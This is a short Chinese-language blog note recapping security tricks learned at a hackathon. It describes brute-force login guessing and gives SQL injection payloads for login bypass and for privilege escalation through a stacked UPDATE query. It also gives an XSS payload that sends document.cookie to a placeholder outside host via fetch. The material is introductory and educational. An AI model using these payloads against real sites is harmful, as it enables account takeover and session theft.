Hackathon

整理下Hackathlon遇到（学到）的东西。这样的比赛还是挺好玩的。做出来一些。

image.png

破解用户登录的方式，可以通过一段程序来模拟用户登录。猜测用户的密码。当然现在大部分网站登录都做了防暴力破解，比如加验证码，加图片数字识别，也有密码输错几次后，直接锁定等操作。

针对没有防止sql注入的网站，我们可以猜测它的sql。核心就是通过加入特殊字符使其sql语句“失效”。例如： select * from users where username='?' and password = '?';
那么当我们知道用户名的时候，可以在password那个表单里面填写：

any' or 1='1

这样完整的sql就变成了 select * from users where username='admin' and password='any' or 1='1';这样就绕过了验证或者可以将他的数据拿到。当然还可以在用户名的表单里面输入 admin' //，加入两个//，这样会使得密码表单无论输入什么都是有效地。
还可以在密码表单里面增加更新sql。

any'; update users set type='admin' where name='xxx

有些网站为了方便debug，会在系统里开backdoor。当我们试验多次的时候，仔细分析它的返回值或者reponse，会得到一些信息。这样方便我们利用它来进一步做些操作。

以前还经常听到流量劫持。我们也可以通过页面上放置一个不存在资源，然后当页面加载的时候，将页面上存储的cookie放送到指定的位置。

X<img src='X' onerror=alert(document.cookie)> 或者fetch("http://xxx.com?p=document.cookie")